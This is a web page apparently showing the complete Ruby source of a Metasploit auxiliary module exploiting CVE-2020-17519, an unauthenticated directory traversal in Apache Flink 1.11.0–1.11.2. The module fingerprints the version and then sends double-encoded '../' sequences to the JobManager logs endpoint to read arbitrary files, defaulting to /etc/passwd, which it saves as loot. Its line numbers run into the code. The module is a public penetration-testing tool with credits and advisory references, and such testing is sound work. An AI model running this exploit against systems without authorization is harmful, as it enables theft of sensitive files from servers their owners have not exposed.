Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Apache Flink JobManager Traversal',15'Description' => %q{16This module exploits an unauthenticated directory traversal vulnerability17in Apache Flink versions 1.11.0 <= 1.11.2. The JobManager REST API fails18to validate user-supplied log file paths, allowing retrieval of arbitrary19files with the privileges of the web server user.2021This module has been tested successfully on Apache Flink version 1.11.222on Ubuntu 18.04.4.23},24'Author' => [25'0rich1 - Ant Security FG Lab', # Vulnerability discovery26'Hoa Nguyen - Suncsr Team', # Metasploit module27'bcoles', # Metasploit module cleanup and improvements28],29'License' => MSF_LICENSE,30'References' => [31['CVE', '2020-17519'],32['CWE', '22'],33['EDB', '49398'],34['PACKETSTORM', '160849'],35['URL', 'https://www.openwall.com/lists/oss-security/2021/01/05/2'],36['URL', 'https://www.tenable.com/cve/CVE-2020-17519']37],38'DefaultOptions' => { 'RPORT' => 8081 },39'DisclosureDate' => '2021-01-05',40'Notes' => {41'Stability' => [CRASH_SAFE],42'Reliability' => [],43'SideEffects' => [IOC_IN_LOGS]44}45)46)4748register_options([49OptInt.new('DEPTH', [ true, 'Depth for path traversal', 10]),50OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])51])52end5354def check_host(_ip)55res = send_request_cgi({56'method' => 'GET',57'uri' => normalize_uri(target_uri.path, 'config')58})5960unless res61return Exploit::CheckCode::Unknown('No reply.')62end6364unless res.body.include?('flink')65return Exploit::CheckCode::Safe('Target is not Apache Flink.')66end6768version = res.get_json_document['flink-version']6970if version.blank?71return Exploit::CheckCode::Detected('Could not determine Apache Flink software version.')72end7374if Rex::Version.new(version).between?(Rex::Version.new('1.11.0'), Rex::Version.new('1.11.2'))75return Exploit::CheckCode::Appears("Apache Flink version #{version} appears vulnerable.")76end7778Exploit::CheckCode::Safe("Apache Flink version #{version} is not vulnerable.")79end8081def retrieve_file(depth, filepath)82traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{'../' * depth}#{filepath}", 'hex-all'))83res = send_request_cgi({84'method' => 'GET',85'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', traversal)86})8788unless res89print_error('No reply')90return91end9293if res.code == 40494print_error('File not found')95return96end9798if res.code == 50099print_error("Unexpected reply (HTTP #{res.code}): Server encountered an error attempting to read file")100msg = res.body.scan(/Caused by: (.+?)\\n/).flatten.last101print_error(msg) if msg102return103end104105if res.code != 200106print_error("Unexpected reply (HTTP #{res.code})")107return108end109110res.body.to_s111end112113def run_host(ip)114depth = datastore['DEPTH']115filepath = datastore['FILEPATH']116117print_status("Downloading #{filepath} ...")118res = retrieve_file(depth, filepath)119120return if res.blank?121122print_good("Downloaded #{filepath} (#{res.length} bytes)")123path = store_loot(124'apache.flink.jobmanager.traversal',125'text/plain',126ip,127res,128File.basename(filepath)129)130print_good("File #{filepath} saved in: #{path}")131end132end133134135